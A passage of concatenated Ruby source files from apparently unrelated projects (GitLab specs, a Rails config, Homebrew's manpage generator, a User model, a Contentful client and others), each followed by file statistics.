listener = SecludIT::CloudyScripts::StateChangeListenerSample.new()
logger = Logger.new(STDOUT)
logger.level = Logger::DEBUG
puts "describe images: #{source_ec2_api.describe_images(:image_id => aws_ami_id).inspect}"
params = {
:ami_id => aws_ami_id,
:helper_ami_id => aws_helper_ami_id,
:source_ami_id => SecludIT::CloudyScripts::AwsEc2Helper.get_basic_aws_linux_ami(aws_source_region),
:ec2_api_handler => source_ec2_api,
:target_ec2_handler => target_ec2_api,
:source_ssh_username => source_ssh_user,
:source_key_name => source_ssh_key_name,
:source_ssh_keyfile => source_ssh_key_file,
:source_ssh_keydata => File.new(source_ssh_key_file, "r").read,
:target_ami_id => SecludIT::CloudyScripts::AwsEc2Helper.get_basic_aws_linux_ami(aws_target_region),
:target_ssh_username => target_ssh_user,
:target_key_name => target_ssh_key_name,
:target_ssh_keyfile => target_ssh_key_file,
:target_ssh_keydata => File.new(target_ssh_key_file, "r").read,
:logger => logger,
:remote_command_handler => ssh,
:name => new_ami_name,
:description => new_ami_description
}
script = CopyMsWindowsAmi.new(params)
script.register_state_change_listener(listener)
script.register_progress_message_listener(listener)
starttime = Time.now.to_i
script.start_script()
endtime = Time.now.to_i
#puts "results = #{script.get_execution_result().inspect}"
puts "== > Results of Copy AMI: #{script.get_execution_result()[:done]}"
puts "New AMI ID: #{script.get_execution_result()[:image_id]}"
puts "done in #{endtime-starttime}s"
end
end
end
end
#
# Launch Simple test
#
SecludIT::CloudyScripts::CopyMsWindowsAmiSampleCode.run()
| 37.625806 | 143 | 0.700274 |
0844616ee1cedd433a30d8ca751fb9cd8f7679dd | 3,203 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe Gitlab::Database::DynamicModelHelpers do
let(:including_class) { Class.new.include(described_class) }
let(:table_name) { 'projects' }
describe '#define_batchable_model' do
subject { including_class.new.define_batchable_model(table_name) }
it 'is an ActiveRecord model' do
expect(subject.ancestors).to include(ActiveRecord::Base)
end
it 'includes EachBatch' do
expect(subject.included_modules).to include(EachBatch)
end
it 'has the correct table name' do
expect(subject.table_name).to eq(table_name)
end
it 'has the inheritance type column disable' do
expect(subject.inheritance_column).to eq('_type_disabled')
end
end
describe '#each_batch' do
subject { including_class.new }
before do
create_list(:project, 2)
end
context 'when no transaction is open' do
before do
allow(subject).to receive(:transaction_open?).and_return(false)
end
it 'iterates table in batches' do
each_batch_size = ->(&block) do
subject.each_batch(table_name, of: 1) do |batch|
block.call(batch.size)
end
end
expect { |b| each_batch_size.call(&b) }
.to yield_successive_args(1, 1)
end
end
context 'when transaction is open' do
before do
allow(subject).to receive(:transaction_open?).and_return(true)
end
it 'raises an error' do
expect { subject.each_batch(table_name, of: 1) { |batch| batch.size } }
.to raise_error(RuntimeError, /each_batch should not run inside a transaction/)
end
end
end
describe '#each_batch_range' do
subject { including_class.new }
let(:first_project) { create(:project) }
let(:second_project) { create(:project) }
context 'when no transaction is open' do
before do
allow(subject).to receive(:transaction_open?).and_return(false)
end
it 'iterates table in batch ranges' do
expect { |b| subject.each_batch_range(table_name, of: 1, &b) }
.to yield_successive_args(
[first_project.id, first_project.id],
[second_project.id, second_project.id]
)
end
it 'yields only one batch if bigger than the table size' do
expect { |b| subject.each_batch_range(table_name, of: 2, &b) }
.to yield_successive_args([first_project.id, second_project.id])
end
it 'makes it possible to apply a scope' do
each_batch_limited = ->(&b) do
subject.each_batch_range(table_name, scope: ->(table) { table.limit(1) }, of: 1, &b)
end
expect { |b| each_batch_limited.call(&b) }
.to yield_successive_args([first_project.id, first_project.id])
end
end
context 'when transaction is open' do
before do
allow(subject).to receive(:transaction_open?).and_return(true)
end
it 'raises an error' do
expect { subject.each_batch_range(table_name, of: 1) { 1 } }
.to raise_error(RuntimeError, /each_batch should not run inside a transaction/)
end
end
end
end
| 28.855856 | 94 | 0.646269 |
1a7ecd06a4a6bb108fbe6e92c5bd6365e3f1541a | 263 | module ApplicationHelper
# Returns the full title on a per-page basis.
def full_title(page_title = '')
base_title = "Connecting Grinnellians"
if page_title.empty?
base_title
else
"#{page_title} | #{base_title}"
end
end
end
| 18.785714 | 47 | 0.653992 |
032449465f234d7c062c95bc5aa994cce70957d8 | 5,082 | # frozen_string_literal: true
# Class documentation comment
Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# Code is not reloaded between requests.
config.cache_classes = true
# Eager load code on boot. This eager loads most of Rails and
# your application in memory, allowing both threaded web servers
# and those relying on copy on write to perform better.
# Rake tasks automatically ignore this option for performance.
config.eager_load = true
# Full error reports are disabled and caching is turned on.
config.consider_all_requests_local = false
config.action_controller.perform_caching = true
# Ensures that a master key has been made available in either ENV["RAILS_MASTER_KEY"]
# or in config/master.key. This key is used to decrypt credentials (and other encrypted files).
# config.require_master_key = true
# Disable serving static files from the `/public` folder by default since
# Apache or NGINX already handles this.
config.public_file_server.enabled = ENV['RAILS_SERVE_STATIC_FILES'].present?
# Compress CSS using a preprocessor.
# config.assets.css_compressor = :sass
# Do not fallback to assets pipeline if a precompiled asset is missed.
config.assets.compile = true
# Enable serving of images, stylesheets, and JavaScripts from an asset server.
# config.action_controller.asset_host = 'http://assets.example.com'
# Specifies the header that your server uses for sending files.
# config.action_dispatch.x_sendfile_header = 'X-Sendfile' # for Apache
# config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for NGINX
# Store uploaded files on the local file system (see config/storage.yml for options).
config.active_storage.service = :local
# Mount Action Cable outside main process or domain.
# config.action_cable.mount_path = nil
# config.action_cable.url = 'wss://example.com/cable'
# config.action_cable.allowed_request_origins = [ 'http://example.com', /http:\/\/example.*/ ]
# Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
# config.force_ssl = true
# Use the lowest log level to ensure availability of diagnostic information
# when problems arise.
config.log_level = :debug
# Prepend all log lines with the following tags.
config.log_tags = [:request_id]
# Use a different cache store in production.
# config.cache_store = :mem_cache_store
# Use a real queuing backend for Active Job (and separate queues per environment).
# config.active_job.queue_adapter = :resque
# config.active_job.queue_name_prefix = "rails_capstone_project_production"
config.action_mailer.perform_caching = false
# Ignore bad email addresses and do not raise email delivery errors.
# Set this to true and configure the email server for immediate delivery to raise delivery errors.
# config.action_mailer.raise_delivery_errors = false
# Enable locale fallbacks for I18n (makes lookups for any locale fall back to
# the I18n.default_locale when a translation cannot be found).
config.i18n.fallbacks = true
# Send deprecation notices to registered listeners.
config.active_support.deprecation = :notify
# Use default logging formatter so that PID and timestamp are not suppressed.
config.log_formatter = ::Logger::Formatter.new
# Use a different logger for distributed setups.
# require 'syslog/logger'
# config.logger = ActiveSupport::TaggedLogging.new(Syslog::Logger.new 'app-name')
if ENV['RAILS_LOG_TO_STDOUT'].present?
logger = ActiveSupport::Logger.new(STDOUT)
logger.formatter = config.log_formatter
config.logger = ActiveSupport::TaggedLogging.new(logger)
end
# Do not dump schema after migrations.
config.active_record.dump_schema_after_migration = false
# Inserts middleware to perform automatic connection switching.
# The `database_selector` hash is used to pass options to the DatabaseSelector
# middleware. The `delay` is used to determine how long to wait after a write
# to send a subsequent read to the primary.
#
# The `database_resolver` class is used by the middleware to determine which
# database is appropriate to use based on the time delay.
#
# The `database_resolver_context` class is used by the middleware to set
# timestamps for the last write to the primary. The resolver uses the context
# class timestamps to determine how long to wait before reading from the
# replica.
#
# By default Rails will store a last write timestamp in the session. The
# DatabaseSelector middleware is designed as such you can define your own
# strategy for connection switching and pass that into the middleware through
# these configuration options.
# config.active_record.database_selector = { delay: 2.seconds }
# config.active_record.database_resolver = ActiveRecord::Middleware::DatabaseSelector::Resolver
# config.active_record.database_resolver_context = ActiveRecord::Middleware::DatabaseSelector::Resolver::Session
end
| 43.435897 | 114 | 0.763676 |
ed91ce519d58bc4d55e4f90cb9b8aeff0df56735 | 6,043 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe 'value stream analytics events', :aggregate_failures do
let_it_be(:project) { create(:project, :repository) }
let_it_be(:user) { project.owner }
let(:from_date) { 10.days.ago }
let!(:context) { create(:issue, project: project, created_at: 2.days.ago) }
let(:events) do
CycleAnalytics::ProjectLevel
.new(project, options: { from: from_date, current_user: user })[stage]
.events
end
let(:event) { events.first }
before do
setup(context)
end
describe '#issue_events' do
let(:stage) { :issue }
it 'has correct attributes' do
expect(event[:total_time]).not_to be_empty
expect(event[:title]).to eq(context.title)
expect(event[:url]).not_to be_nil
expect(event[:iid]).to eq(context.iid.to_s)
expect(event[:created_at]).to end_with('ago')
expect(event[:author][:web_url]).not_to be_nil
expect(event[:author][:avatar_url]).not_to be_nil
expect(event[:author][:name]).to eq(context.author.name)
end
end
describe '#plan_events' do
let(:stage) { :plan }
before do
create_commit_referencing_issue(context)
# Adding extra duration because the new VSA backend filters out 0 durations between these columns
context.metrics.update!(first_mentioned_in_commit_at: context.metrics.first_associated_with_milestone_at + 1.day)
end
it 'has correct attributes' do
expect(event[:total_time]).not_to be_empty
expect(event[:title]).to eq(context.title)
expect(event[:url]).not_to be_nil
expect(event[:iid]).to eq(context.iid.to_s)
expect(event[:created_at]).to end_with('ago')
expect(event[:author][:web_url]).not_to be_nil
expect(event[:author][:avatar_url]).not_to be_nil
expect(event[:author][:name]).to eq(context.author.name)
end
end
describe '#code_events' do
let(:stage) { :code }
let!(:merge_request) { MergeRequest.first }
before do
create_commit_referencing_issue(context)
end
it 'has correct attributes' do
expect(event[:total_time]).not_to be_empty
expect(event[:title]).to eq('Awesome merge_request')
expect(event[:iid]).to eq(context.iid.to_s)
expect(event[:created_at]).to end_with('ago')
expect(event[:author][:web_url]).not_to be_nil
expect(event[:author][:avatar_url]).not_to be_nil
expect(event[:author][:name]).to eq(MergeRequest.first.author.name)
end
end
describe '#test_events', :sidekiq_might_not_need_inline do
let(:stage) { :test }
let(:merge_request) { MergeRequest.first }
let!(:context) { create(:issue, project: project, created_at: 2.days.ago) }
let!(:pipeline) do
create(:ci_pipeline,
ref: merge_request.source_branch,
sha: merge_request.diff_head_sha,
project: project,
head_pipeline_of: merge_request)
end
before do
create(:ci_build, :success, pipeline: pipeline, author: user)
create(:ci_build, :success, pipeline: pipeline, author: user)
pipeline.run!
pipeline.succeed!
merge_merge_requests_closing_issue(user, project, context)
end
it 'has correct attributes' do
expect(event[:name]).not_to be_nil
expect(event[:id]).not_to be_nil
expect(event[:url]).not_to be_nil
expect(event[:branch]).not_to be_nil
expect(event[:branch][:url]).not_to be_nil
expect(event[:short_sha]).not_to be_nil
expect(event[:commit_url]).not_to be_nil
expect(event[:date]).not_to be_nil
expect(event[:total_time]).not_to be_empty
end
end
describe '#review_events' do
let(:stage) { :review }
let!(:context) { create(:issue, project: project, created_at: 2.days.ago) }
before do
merge_merge_requests_closing_issue(user, project, context)
end
it 'has correct attributes' do
expect(event[:total_time]).not_to be_empty
expect(event[:title]).to eq('Awesome merge_request')
expect(event[:iid]).to eq(context.iid.to_s)
expect(event[:url]).not_to be_nil
expect(event[:state]).not_to be_nil
expect(event[:created_at]).not_to be_nil
expect(event[:author][:web_url]).not_to be_nil
expect(event[:author][:avatar_url]).not_to be_nil
expect(event[:author][:name]).to eq(MergeRequest.first.author.name)
end
end
describe '#staging_events', :sidekiq_might_not_need_inline do
let(:stage) { :staging }
let(:merge_request) { MergeRequest.first }
let!(:pipeline) do
create(:ci_pipeline,
ref: merge_request.source_branch,
sha: merge_request.diff_head_sha,
project: project,
head_pipeline_of: merge_request)
end
before do
create(:ci_build, :success, pipeline: pipeline, author: user)
create(:ci_build, :success, pipeline: pipeline, author: user)
pipeline.run!
pipeline.succeed!
merge_merge_requests_closing_issue(user, project, context)
deploy_master(user, project)
end
it 'has correct attributes' do
expect(event[:name]).not_to be_nil
expect(event[:id]).not_to be_nil
expect(event[:url]).not_to be_nil
expect(event[:branch]).not_to be_nil
expect(event[:branch][:url]).not_to be_nil
expect(event[:short_sha]).not_to be_nil
expect(event[:commit_url]).not_to be_nil
expect(event[:date]).not_to be_nil
expect(event[:total_time]).not_to be_empty
expect(event[:author][:web_url]).not_to be_nil
expect(event[:author][:avatar_url]).not_to be_nil
expect(event[:author][:name]).to eq(MergeRequest.first.author.name)
end
end
def setup(context)
milestone = create(:milestone, project: project)
context.update!(milestone: milestone)
mr = create_merge_request_closing_issue(user, project, context, commit_message: "References #{context.to_reference}")
ProcessCommitWorker.new.perform(project.id, user.id, mr.commits.last.to_hash)
end
end
| 33.021858 | 121 | 0.675658 |
18f1842e414a5197db77f4eaab782615801096fb | 137 | FactoryGirl.define do
factory :conversion_host do
sequence(:name) { |n| "conversion_host_#{seq_padded_for_sorting(n)}" }
end
end
| 22.833333 | 74 | 0.737226 |
6a3e27c3728554253d46ee722e107aa2760e8865 | 8,944 | # typed: false
# frozen_string_literal: true
require "formula"
require "erb"
require "ostruct"
require "cli/parser"
module Homebrew
extend T::Sig
module_function
SOURCE_PATH = (HOMEBREW_LIBRARY_PATH/"manpages").freeze
TARGET_MAN_PATH = (HOMEBREW_REPOSITORY/"manpages").freeze
TARGET_DOC_PATH = (HOMEBREW_REPOSITORY/"docs").freeze
sig { returns(CLI::Parser) }
def man_args
Homebrew::CLI::Parser.new do
usage_banner <<~EOS
`man` [<options>]
Generate Homebrew's manpages.
EOS
switch "--fail-if-changed",
description: "Return a failing status code if changes are detected in the manpage outputs. This "\
"can be used to notify CI when the manpages are out of date. Additionally, "\
"the date used in new manpages will match those in the existing manpages (to allow "\
"comparison without factoring in the date)."
switch "--link",
description: "This is now done automatically by `brew update`."
max_named 0
end
end
def man
args = man_args.parse
odie "`brew man --link` is now done automatically by `brew update`." if args.link?
Commands.rebuild_internal_commands_completion_list
regenerate_man_pages(preserve_date: args.fail_if_changed?, quiet: args.quiet?)
diff = system_command "git", args: [
"-C", HOMEBREW_REPOSITORY, "diff", "--exit-code", "docs/Manpage.md", "manpages", "completions"
]
if diff.status.success?
puts "No changes to manpage or completions output detected."
elsif args.fail_if_changed?
puts "Changes to manpage or completions detected:"
puts diff.stdout
Homebrew.failed = true
end
end
def regenerate_man_pages(preserve_date:, quiet:)
Homebrew.install_bundler_gems!
markup = build_man_page(quiet: quiet)
convert_man_page(markup, TARGET_DOC_PATH/"Manpage.md", preserve_date: preserve_date)
convert_man_page(markup, TARGET_MAN_PATH/"brew.1", preserve_date: preserve_date)
end
def build_man_page(quiet:)
template = (SOURCE_PATH/"brew.1.md.erb").read
variables = OpenStruct.new
variables[:commands] = generate_cmd_manpages(Commands.internal_commands_paths)
variables[:developer_commands] = generate_cmd_manpages(Commands.internal_developer_commands_paths)
variables[:official_external_commands] =
generate_cmd_manpages(Commands.official_external_commands_paths(quiet: quiet))
variables[:global_cask_options] = global_cask_options_manpage
variables[:global_options] = global_options_manpage
variables[:environment_variables] = env_vars_manpage
readme = HOMEBREW_REPOSITORY/"README.md"
variables[:lead] =
readme.read[/(Homebrew's \[Project Leader.*\.)/, 1]
.gsub(/\[([^\]]+)\]\([^)]+\)/, '\1')
variables[:plc] =
readme.read[/(Homebrew's \[Project Leadership Committee.*\.)/, 1]
.gsub(/\[([^\]]+)\]\([^)]+\)/, '\1')
variables[:tsc] =
readme.read[/(Homebrew's \[Technical Steering Committee.*\.)/, 1]
.gsub(/\[([^\]]+)\]\([^)]+\)/, '\1')
variables[:linux] =
readme.read[%r{(Homebrew/brew's Linux maintainers .*\.)}, 1]
.gsub(/\[([^\]]+)\]\([^)]+\)/, '\1')
variables[:maintainers] =
readme.read[/(Homebrew's other current maintainers .*\.)/, 1]
.gsub(/\[([^\]]+)\]\([^)]+\)/, '\1')
variables[:alumni] =
readme.read[/(Former maintainers .*\.)/, 1]
.gsub(/\[([^\]]+)\]\([^)]+\)/, '\1')
ERB.new(template, trim_mode: ">").result(variables.instance_eval { binding })
end
def sort_key_for_path(path)
# Options after regular commands (`~` comes after `z` in ASCII table).
path.basename.to_s.sub(/\.(rb|sh)$/, "").sub(/^--/, "~~")
end
def convert_man_page(markup, target, preserve_date:)
manual = target.basename(".1")
organisation = "Homebrew"
# Set the manpage date to the existing one if we're checking for changes.
# This avoids the only change being e.g. a new date.
date = if preserve_date && target.extname == ".1" && target.exist?
/"(\d{1,2})" "([A-Z][a-z]+) (\d{4})" "#{organisation}" "#{manual}"/ =~ target.read
Date.parse("#{Regexp.last_match(1)} #{Regexp.last_match(2)} #{Regexp.last_match(3)}")
else
Date.today
end
date = date.strftime("%Y-%m-%d")
shared_args = %W[
--pipe
--organization=#{organisation}
--manual=#{target.basename(".1")}
--date=#{date}
]
format_flag, format_desc = target_path_to_format(target)
puts "Writing #{format_desc} to #{target}"
Utils.popen(["ronn", format_flag] + shared_args, "rb+") do |ronn|
ronn.write markup
ronn.close_write
ronn_output = ronn.read
odie "Got no output from ronn!" if ronn_output.blank?
case format_flag
when "--markdown"
ronn_output = ronn_output.gsub(%r{<var>(.*?)</var>}, "*`\\1`*")
.gsub(/\n\n\n+/, "\n\n")
when "--roff"
ronn_output = ronn_output.gsub(%r{<code>(.*?)</code>}, "\\fB\\1\\fR")
.gsub(%r{<var>(.*?)</var>}, "\\fI\\1\\fR")
.gsub(/(^\[?\\fB.+): /, "\\1\n ")
end
target.atomic_write ronn_output
end
end
def target_path_to_format(target)
case target.basename
when /\.md$/ then ["--markdown", "markdown"]
when /\.\d$/ then ["--roff", "man page"]
else
odie "Failed to infer output format from '#{target.basename}'."
end
end
def generate_cmd_manpages(cmd_paths)
man_page_lines = []
# preserve existing manpage order
cmd_paths.sort_by(&method(:sort_key_for_path))
.each do |cmd_path|
cmd_man_page_lines = if cmd_parser = CLI::Parser.from_cmd_path(cmd_path)
next if cmd_parser.hide_from_man_page
cmd_parser_manpage_lines(cmd_parser).join
else
cmd_comment_manpage_lines(cmd_path)
end
man_page_lines << cmd_man_page_lines
end
man_page_lines.compact.join("\n")
end
def cmd_parser_manpage_lines(cmd_parser)
lines = [format_usage_banner(cmd_parser.usage_banner_text)]
lines += cmd_parser.processed_options.map do |short, long, _, desc|
if long.present?
next if Homebrew::CLI::Parser.global_options.include?([short, long, desc])
next if Homebrew::CLI::Parser.global_cask_options.any? do |_, option, description:, **|
[long, "#{long}="].include?(option) && description == desc
end
end
generate_option_doc(short, long, desc)
end.reject(&:blank?)
lines
end
def cmd_comment_manpage_lines(cmd_path)
comment_lines = cmd_path.read.lines.grep(/^#:/)
return if comment_lines.empty?
return if comment_lines.first.include?("@hide_from_man_page")
lines = [format_usage_banner(comment_lines.first).chomp]
comment_lines.slice(1..-1)
.each do |line|
line = line.slice(4..-2)
unless line
lines.last << "\n"
next
end
# Omit the common global_options documented separately in the man page.
next if line.match?(/--(debug|help|quiet|verbose) /)
# Format one option or a comma-separated pair of short and long options.
lines << line.gsub(/^ +(-+[a-z-]+), (-+[a-z-]+) +/, "* `\\1`, `\\2`:\n ")
.gsub(/^ +(-+[a-z-]+) +/, "* `\\1`:\n ")
end
lines.last << "\n"
lines
end
sig { returns(String) }
def global_cask_options_manpage
lines = ["These options are applicable to subcommands accepting a `--cask` flag and all `cask` commands.\n"]
lines += Homebrew::CLI::Parser.global_cask_options.map do |_, long, description:, **|
generate_option_doc(nil, long, description)
end
lines.join("\n")
end
sig { returns(String) }
def global_options_manpage
lines = ["These options are applicable across multiple subcommands.\n"]
lines += Homebrew::CLI::Parser.global_options.map do |short, long, desc|
generate_option_doc(short, long, desc)
end
lines.join("\n")
end
sig { returns(String) }
def env_vars_manpage
lines = Homebrew::EnvConfig::ENVS.flat_map do |env, hash|
entry = " * `#{env}`:\n #{hash[:description]}\n"
default = hash[:default_text]
default ||= "`#{hash[:default]}`." if hash[:default]
entry += "\n\n *Default:* #{default}\n" if default
entry
end
lines.join("\n")
end
def generate_option_doc(short, long, desc)
comma = (short && long) ? ", " : ""
<<~EOS
* #{format_short_opt(short)}#{comma}#{format_long_opt(long)}:
#{desc}
EOS
end
def format_short_opt(opt)
"`#{opt}`" unless opt.nil?
end
def format_long_opt(opt)
"`#{opt}`" unless opt.nil?
end
def format_usage_banner(usage_banner)
usage_banner&.sub(/^(#: *\* )?/, "### ")
end
end
| 33.498127 | 112 | 0.614714 |
d59fa000aed0b927912b833f2ac847c292a60966 | 264 | # frozen_string_literal: true
class StudentsTableReflex < ApplicationReflex
include SortHelper
def sort
sort_records(records: Student.all,
partial: "students_table",
sort_columns: %w[first_name last_name guardian_last_name status])
end
end
| 22 | 71 | 0.765152 |
1d6faf256bde144c2c6c821c37a67d21caf10b35 | 450 | require 'spec_helper'
describe "opendata_app_categories", type: :feature, dbscope: :example do
let(:site) { cms_site }
let(:node) { create_once :opendata_node_app_category, name: "opendata_app_categories" }
let(:index_path) { opendata_app_categories_path site, node }
context "app_categories" do
before { login_cms_user }
it "#index" do
visit index_path
expect(current_path).not_to eq sns_login_path
end
end
end
| 25 | 89 | 0.726667 |
1cb84d2de8d596cdf3e493e1dbf3bdc080b1cbe1 | 719 | require 'test_helper'
class Liquid::Drops::LineItemDropTest < ActiveSupport::TestCase
include Liquid
def setup
@line_item = FactoryBot.build(:line_item)
@drop = Drops::LineItem.new(@line_item)
end
should "return name" do
@line_item.name = 'foo'
assert_equal(@line_item.name, @drop.name)
end
should "return description" do
@line_item.description = 'description foo'
assert_equal(@line_item.description, @drop.description)
end
should "return quantity" do
@line_item.quantity = 5
assert_equal(@line_item.quantity, @drop.quantity)
end
should "return cost" do
@line_item.cost = ThreeScale::Money.new(245, 'EUR')
assert_equal('245.00', @drop.cost)
end
end
| 22.46875 | 63 | 0.703755 |
0823bf7952db398bcf052eb015721de346508759 | 1,802 | require_relative 'resource'
module Contentful
module Management
# Resource class for Role.
class Role
include Contentful::Management::Resource
include Contentful::Management::Resource::Refresher
include Contentful::Management::Resource::SystemProperties
property :name, :string
property :policies, :array
property :description, :string
property :permissions, :hash
# @private
def self.create_attributes(_client, attributes)
{
'name' => attributes.fetch(:name),
'description' => attributes.fetch(:description),
'permissions' => attributes.fetch(:permissions),
'policies' => attributes.fetch(:policies)
}
end
# Creates a role.
#
# @param [Contentful::Management::Client] client
# @param [String] space_id
# @param [Hash] attributes
#
# @return [Contentful::Management::Role]
def self.create(client, space_id, attributes = {})
super(client, space_id, nil, attributes)
end
# Finds a role by ID.
#
# @param [Contentful::Management::Client] client
# @param [String] space_id
# @param [String] role_id
#
# @return [Contentful::Management::Role]
def self.find(client, space_id, role_id)
super(client, space_id, nil, role_id)
end
protected
def query_attributes(attributes)
{
name: name,
description: description,
permissions: permissions,
policies: policies
}.merge(
attributes.each_with_object({}) { |(k, v), result| result[k.to_sym] = v }
)
end
# @private
def refresh_find
self.class.find(client, space.id, id)
end
end
end
end
| 26.5 | 83 | 0.597114 |
61e0597d25450946e924b5cdb9f105119c744f23 | 30 | $: << 'lib'
require 'rubyrdf'
| 10 | 17 | 0.566667 |
3343782d933e45f31e759ad81541f3edc54b59a5 | 3,459 | class User < ApplicationRecord
has_many :microposts, dependent: :destroy
has_many :active_relationships, class_name: "Relationship",
foreign_key: "follower_id",
dependent: :destroy
has_many :passive_relationships, class_name: "Relationship",
foreign_key: "followed_id",
dependent: :destroy
has_many :following, through: :active_relationships, source: :followed
has_many :followers, through: :passive_relationships, source: :follower
attr_accessor :remember_token, :activation_token, :reset_token
before_save :downcase_email
before_create :create_activation_digest
validates :name, presence: true, length: { maximum: 50 }
VALID_EMAIL_REGEX = /\A[\w+\-.]+@[a-z\d\-]+(\.[a-z\d\-]+)*\.[a-z]+\z/i
validates :email, presence: true, length: { maximum: 255 },
format: { with: VALID_EMAIL_REGEX },
uniqueness: {case_sensitive: false}
has_secure_password
validates :password, presence: true, length: { minimum: 6 }, allow_nil: true
# 渡された文字列のハッシュ値を返す
def self.digest(string)
cost = ActiveModel::SecurePassword.min_cost ? BCrypt::Engine::MIN_COST : BCrypt::Engine.cost
BCrypt::Password.create(string, cost: cost)
end
# ランダムなトークンを返す
def self.new_token
SecureRandom.urlsafe_base64
end
# 永続セッションのためにユーザをデータベースに記憶する
def remember
self.remember_token = User.new_token
update_attribute(:remember_digest, User.digest(remember_token))
end
# トークンがダイジェストと一致したらtrueを返す
def authenticated?(attribute, token)
digest = send("#{attribute}_digest")
return false if digest.nil?
BCrypt::Password.new(digest).is_password?(token)
end
# ユーザーのログイン情報を破棄する
def forget
update_attribute(:remember_digest, nil)
end
# アカウントを有効にする
def activate
update_columns(activated: true, activated_at: Time.zone.now)
end
# 有効化用のメールを送信する
def send_activation_email
UserMailer.account_activation(self).deliver_now
end
# パスワード再設定の属性を設定する
def create_reset_digest
self.reset_token = User.new_token
# update_attribute(:reset_digest, User.digest(reset_token))
# update_attribute(:reset_sent_at, Time.zone.now)
update_columns(reset_digest: User.digest(reset_token), reset_sent_at: Time.zone.now)
end
# パスワードの再設定メールを送信する
def send_password_reset_email
UserMailer.password_reset(self).deliver_now
end
# パスワード再設定の期限が切れている場合はtrueを返す
def password_reset_expired?
reset_sent_at < 2.hours.ago
end
# ユーザーのステータスフィードを返す
def feed
following_ids = "SELECT followed_id FROM relationships
WHERE follower_id = :user_id"
Micropost.where("user_id IN (#{following_ids})
OR user_id = :user_id", user_id: id)
end
# ユーザーをフォローする
def follow(other_user)
active_relationships.create(followed_id: other_user.id)
end
# ユーザーをフォロー解除する
def unfollow(other_user)
active_relationships.find_by(followed_id: other_user.id).destroy
end
# 現在のユーザーがフォローしていたらtrueを返す
def following?(other_user)
following.include?(other_user)
end
private
# メールアドレスをすべて小文字にする
def downcase_email
self.email = email.downcase
end
# 有効化トークンとダイジェストを作成及び代入する
def create_activation_digest
self.activation_token = User.new_token
self.activation_digest = User.digest(activation_token)
end
end
| 30.342105 | 96 | 0.696155 |
e20a3b8ed0b9d0adaf0f92a333c6c72933297394 | 2,852 | require 'spec_helper'
require 'phraseapp-in-context-editor-ruby'
require 'phraseapp-in-context-editor-ruby/displayable_key_identifier'
require 'phraseapp-in-context-editor-ruby/fallback_keys_fetcher'
describe PhraseApp::InContextEditor::DisplayableKeyIdentifier do
let(:identifier) { PhraseApp::InContextEditor::DisplayableKeyIdentifier.new(PhraseApp::InContextEditor::ApiWrapper.new) }
describe "#identify(key_name, options)" do
let(:key) { "foo.main" }
let(:options) { {} }
let(:keys) { [] }
subject{ identifier.identify(key, options)}
before(:each) do
allow(PhraseApp::InContextEditor::FallbackKeysFetcher).to receive(:extract_fallback_keys).with(key, options).and_return(["foo.fallback1", "foo.fallback2"])
allow(identifier).to receive(:find_keys_within_phraseapp).and_return(keys)
end
context "standard key can be found via phrase service" do
let(:keys) { ["foo.main"] }
it{ is_expected.to eq "foo.main" }
end
context "standard key cannot be found but first fallback is available" do
let(:keys) { ["foo.fallback1", "foo.fallback2"] }
it { is_expected.to eq "foo.fallback1" }
end
context "standard key cannot be found but second fallback is available" do
let(:keys) { ["foo.fallback2"] }
it { is_expected.to eq "foo.fallback2" }
end
context "no key can be cound via phrase service" do
it { is_expected.to eq "foo.main" }
end
end
describe "#find_keys_within_phraseapp(key_names)" do
let(:key_names) { ["foo", "bar", "baz"] }
let(:keys_from_api) { [] }
let(:pre_cached) { [] }
let(:pre_fetched) { [] }
subject { identifier.send(:find_keys_within_phraseapp, key_names) }
before(:each) do
allow(identifier).to receive(:key_names_returned_from_api_for).and_return(keys_from_api)
allow(identifier.key_names_cache).to receive(:pre_cached).and_return(pre_cached)
allow(identifier.key_names_cache).to receive(:pre_fetched).and_return(pre_fetched)
end
it { is_expected.to be_an(Array) }
context "some keys are prefetched" do
let(:pre_fetched) { ["foo", "bar"] }
let(:pre_cached) { ["foo"] }
context "api returns additional results" do
let(:keys_from_api) { ["baz"] }
it { is_expected.to eq ["foo", "baz"] }
end
context "api returns no results" do
let(:keys_from_api) { [] }
it { is_expected.to eq ["foo"] }
end
end
context "no keys are prefetched" do
let(:pre_fetched) { [] }
let(:pre_cached) { [] }
context "api returns results" do
let(:keys_from_api) { ["baz"] }
it { is_expected.to eq ["baz"] }
end
context "api returns no results" do
let(:keys_from_api) { [] }
it { is_expected.to eq [] }
end
end
end
end | 29.402062 | 161 | 0.652174 |
91e6f00195d1eb8a6d4e574d9fb8f984665e20d6 | 1,559 | #!/usr/bin/env ruby -rubygems
# -*- encoding: utf-8 -*-
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
Gem::Specification.new do |gem|
gem.version = File.read('VERSION').chomp
gem.date = File.mtime('VERSION').strftime('%Y-%m-%d')
gem.name = 'rack-throttle'
gem.homepage = 'https://github.com/bendiken/rack-throttle'
gem.license = 'Public Domain' if gem.respond_to?(:license=)
gem.summary = 'HTTP request rate limiter for Rack applications.'
gem.description = 'Rack middleware for rate-limiting incoming HTTP requests.'
gem.authors = ['Arto Bendiken']
gem.email = '[email protected]'
gem.platform = Gem::Platform::RUBY
gem.files = %w(AUTHORS README UNLICENSE VERSION) + Dir.glob('lib/**/*.rb')
gem.bindir = %q(bin)
gem.executables = %w()
gem.default_executable = gem.executables.first
gem.require_paths = %w(lib)
gem.extensions = %w()
gem.test_files = %w()
gem.has_rdoc = false
gem.required_ruby_version = '>= 1.8.2'
gem.requirements = []
gem.add_runtime_dependency 'bundler', '>= 1.0.0'
gem.add_development_dependency 'rack-test'
gem.add_development_dependency 'rspec'
gem.add_development_dependency 'yard'
gem.add_development_dependency 'timecop'
gem.add_runtime_dependency 'rack', '>= 1.0.0'
gem.post_install_message = nil
end
| 36.255814 | 89 | 0.607441 |
abaabad5d65fac35e22907aa9ad536ce222f7491 | 24,903 | # rubocop:disable GitlabSecurity/PublicSend
require_dependency Rails.root.join('lib/gitlab') # Load Gitlab as soon as possible
class Settings < Settingslogic
source ENV.fetch('GITLAB_CONFIG') { "#{Rails.root}/config/gitlab.yml" }
namespace Rails.env
class << self
def gitlab_on_standard_port?
on_standard_port?(gitlab)
end
def host_without_www(url)
host(url).sub('www.', '')
end
